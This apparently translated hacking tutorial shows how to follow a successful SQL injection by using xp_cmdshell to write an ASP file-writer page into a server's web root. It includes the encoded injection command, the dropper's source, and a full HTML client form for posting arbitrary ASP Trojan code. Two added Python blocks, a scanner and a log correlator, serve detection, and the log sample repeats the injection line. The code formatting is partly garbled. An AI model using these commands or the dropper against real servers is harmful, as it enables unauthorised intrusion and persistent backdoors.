After a successful SQL injection, getting a Trojan onto the server has always been a headache. Here I provide another method for uploading one.
1. During the SQL injection, xp_cmdshell is used to write an ASP file to the server; that ASP file can in turn write other files to the server.
File content:
<%
Set objfso = server. Createobject
("Scripting. FileSystemObject ")
Set objcountfile = objfso. createtextfile
(Request ("mypath"), true)
Objcountfile. Write Request ("mydata ")
Objcountfile. Close
%>
This file can be written as a single line:
<% Set objfso = server. Createobject
("Scripting. FileSystemObject "):
Set objcountfile = objfso. createtextfile
(Request ("mypath"), true): objcountfile. Write Request ("mydata "):
Objcountfile. Close %>
Encode the special characters to obtain:
% 3C % 25 set % 20 objfso % 20 = % 20server. Createobject
(% 22scripting. FileSystemObject % 22 ):
Set % 20 objcountfile = objfso. createtextfile (Request (% 22 mypath % 22), true ):
Objcountfile. Write % 20 Request (% 22 mydata % 22): objcountfile. Close % 25% 3E
Injection (assume that the web directory is C:/inetpub/wwwroot/):
Exec master..xp_cmdshell 'echo
"% 3C % 25 set % 20 objfso % 20 = % 20server. Createobject
(% 22scripting. FileSystemObject % 22 ):
Set % 20 objcountfile = objfso. createtextfile
(Request (% 22 mypath % 22), true ):
Objcountfile. Write % 20 Request (% 22 mydata % 22 ):
Objcountfile. Close % 25% 3e "> C:/inetpub/wwwroot/ftp. asp ';
In this way, an ftp.asp file is generated under the web directory of the server.
The code of this file is:
<%
Set objfso = server. Createobject
("Scripting. FileSystemObject ")
Set objcountfile = objfso. createtextfile
(Request ("mypath"), true)
Objcountfile. Write Request
("Mydata ")
Objcountfile. Close
%>
As you can see, the code above exposes two request parameters: mypath and mydata.
mypath is the path of the file to be generated by the next submission.
mydata is the content of that file.
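For defenders, the distinguishing feature of this page is that both the path and the content passed to FileSystemObject come straight from the request. The following scanner is an added example, not part of the original article: it flags ASP source with that pattern in both the multi-line and the one-line form. The function name and the sample pages are constructed for illustration.

```python
import re

# Request("x"), Request.Form("x") or Request.QueryString("x")
REQ = r'request(?:\s*\.\s*(?:form|querystring))?\s*\(\s*"[^"]*"\s*\)'
FSO = re.compile(r'\bset\s+(\w+)\s*=\s*(?:server\s*\.\s*)?createobject\s*'
                 r'\(\s*"scripting\.filesystemobject"\s*\)', re.I)

def find_request_driven_writes(source):
    """Return one finding per file handle opened on a client-supplied path."""
    findings = []
    for fso in sorted({m.group(1).lower() for m in FSO.finditer(source)}):
        # A file opened through this FSO variable whose first argument is Request(...)
        opener = re.compile(rf'\bset\s+(\w+)\s*=\s*{re.escape(fso)}\s*\.\s*'
                            rf'(createtextfile|opentextfile)\s*\(\s*{REQ}', re.I)
        for m in opener.finditer(source):
            handle = m.group(1)
            # The same handle writing a Request(...) value
            writer = re.compile(rf'\b{re.escape(handle)}\s*\.\s*write(?:line)?'
                                rf'\s*\(?\s*{REQ}', re.I)
            findings.append({
                "handle": handle,
                "method": m.group(2).lower(),
                "path_from_request": True,
                "content_from_request": bool(writer.search(source)),
            })
    return findings

# Constructed samples: the pattern described above, its one-line form,
# and a page that logs to a fixed path (must not be flagged).
DROPPER = '''<%
Set objfso = Server.CreateObject("Scripting.FileSystemObject")
Set objcountfile = objfso.CreateTextFile(Request("mypath"), True)
objcountfile.Write Request("mydata")
objcountfile.Close
%>'''
ONE_LINE = "<% " + ": ".join(DROPPER.splitlines()[1:-1]) + " %>"
BENIGN = '''<%
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath("visits.log"), 8, True)
f.WriteLine Request("name")
f.Close
%>'''

if __name__ == "__main__":
    for label, src in (("dropper", DROPPER), ("one-line", ONE_LINE), ("benign", BENIGN)):
        print(label, find_request_driven_writes(src))
```

Run it over every .asp and .asa file under the web root; a hit with both flags set means the page lets any caller create arbitrary files.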
Write a client file locally. The code of rohuclient.htm is as follows:
<! Doctype HTML public "-// W3C // dtd html 4.01 transitional // en">
<HTML>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Title> zombie file generator -- client creation: absolute zero QQ: 12216796 </title>
<Style type = "text/CSS">
<! --
TD {
Font-size: 9pt; line-Height: 150%
}
Body {
Font-size: 12px;
Font-family: verdana, Arial, Helvetica, sans-serif,;
SCROLLBAR-FACE-COLOR: # eeeeee;
SCROLLBAR-HIGHLIGHT-COLOR: # ffffff;
SCROLLBAR-SHADOW-COLOR: # dee3e7;
SCROLLBAR-3DLIGHT-COLOR: # d1d7dc;
SCROLLBAR-ARROW-COLOR: #006699;
SCROLLBAR-TRACK-COLOR: # ededed;
SCROLLBAR-DARKSHADOW-COLOR: #98aab1
}
A: link {
Font-size: 9pt; color: #363636; line-Height: 18px; text-Decoration: None
}
A: visited {
Font-size: 9pt; color: #363636; line-Height: 18px; text-Decoration: None
}
A: hover {
Color: # cc0000; line-Height: 18px; text-Decoration: underline
}
Input, select, textarea {
Font-family: "tahoma", "Arial", "Helvetica", "Sans-serif", "";
Background-color: # f9f9f9;
Font-size: 9pt;
Border: 1px # d2d2d2 dobble;
Line-Height: 120%;
}
-->
</Style>
</Head>
<Script language = "JavaScript" type = "text/JavaScript">
Function chk (theform)
{
If (theform. ftpurl. value = '')
{
Alert ('Enter the submitted address! ');
Theform. ftpurl. Focus ();
Return false;
}
If (theform. mypath. value = '')
{
Alert ('Enter the location of the generated file! ');
Theform. mypath. Focus ();
Return false;
}
If (theform. mydata. value = '')
{
Alert ('Enter the content of the generated file! ');
Theform. mydata. Focus ();
Return false;
}
Theform. Action = theform. ftpurl. value;
}
</SCRIPT>
<Body>
<Form name = "rohuform" method = "Post"
Action = "" onsubmit = "Return chk (this)" target = "_ blank">
<Table width = "673" border = "0" align = "center"
Cellpadding = "0" cellspacing = "0">
<Tr>
<TD width = "11%"> Target Location: </TD>
& Lt; TD width = "79%" & gt; <input name = "ftpurl"
Type = "text" id = "ftpurl" size = "50">
Example: http: // 127.0.0.1/ftp. asp <;/TD>
</Tr>
<Tr>
<TD> Generate a file: </TD>
<TD> <input name = "mypath" type = "text" id = "mypath">
The file path generated on the server. Example:
C:/inetpub/wwwroot/server. asp </TD>
</Tr>
<Tr>
<TD valign = "TOP"> file code: </TD>
<TD> <textarea name = "mydata" Cols = "100"
Rows = "10" id = "textarea"> </textarea> </TD>
</Tr>
<Tr>
<TD> </TD>
<TD> <input type = "Submit" name = "Submit" value = "Submit"> </TD>
</Tr>
</Table>
<Br>
</Form>
<Table width = "100%" border = "0" cellspacing = "0" cellpadding = "0">
<Tr>
<TD align = "center"> All Rights Reserved:
XXXX (<a href = http://www.rxxx.com;> XX umeng </a>) </TD>
</Tr>
</Table>
</Body>
</Html>
Fill in the URL of the generated ftp.asp file in the Target Location field, for example http://127.0.0.1/ftp.asp (assuming the server IP address is 127.0.0.1).
In the Generate a file field, enter the path of the file to be created on the server, for example C:/inetpub/wwwroot/server.asp.
Paste any ASP code into the file code field.
Click Submit. When the http://127.0.0.1/ftp.asp file is executed, the ASP Trojan is generated on the server.
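Both stages described above leave traces in the web server's request log, and the following added example (not part of the original article) correlates them. It assumes a simplified six-field W3C-style layout and uses constructed log lines with a placeholder payload. Because the client form uses POST, the mypath and mydata values are not in the log, so the correlation keys on the file name written by the xp_cmdshell request.

```python
import re
from urllib.parse import unquote_plus

XP = re.compile(r"\bxp_cmdshell\b", re.I)
# Shell redirect into a script file, e.g. "> C:/inetpub/wwwroot/ftp.asp"
REDIRECT = re.compile(r">\s*([^\s'\"<>|]+\.(?:asp|asa|aspx))", re.I)

# Constructed log: date time method uri-stem uri-query status
SAMPLE_LOG = """\
2024-05-01 10:00:01 GET /news.asp id=12 200
2024-05-01 10:00:09 GET /index.asp - 200
2024-05-01 10:02:17 GET /news.asp id=12;exec%20master..xp_cmdshell%20%27echo%20PLACEHOLDER%20%3E%20C:/inetpub/wwwroot/ftp.asp%27; 200
2024-05-01 10:02:40 POST /ftp.asp - 200
2024-05-01 10:02:55 GET /server.asp - 200
2024-05-01 10:03:10 GET /index.asp - 200
"""

def correlate(log_text):
    """Return (line_no, label, detail) tuples for the stages described above."""
    alerts, dropped, seen, injected = [], set(), set(), False
    for no, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if len(parts) != 6:
            continue  # skip comment headers and malformed lines
        _date, _time, method, stem, query, _status = parts
        decoded = unquote_plus(query)
        name = stem.rsplit("/", 1)[-1].lower()
        if XP.search(decoded):
            injected = True
            targets = [t.replace("\\", "/").rsplit("/", 1)[-1].lower()
                       for t in REDIRECT.findall(decoded)]
            dropped.update(targets)
            alerts.append((no, "xp_cmdshell-in-query", ",".join(targets) or "-"))
        elif name in dropped:
            # A request to the file that the injected command wrote
            alerts.append((no, "access-to-written-file", f"{method} {stem}"))
        elif injected and stem.lower() not in seen:
            # A script path never requested before the injection
            alerts.append((no, "first-seen-after-injection", stem))
        seen.add(stem.lower())
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG):
        print(alert)
```

The first-seen label is a heuristic: it needs enough history before the injection to know which script paths are normal for the site.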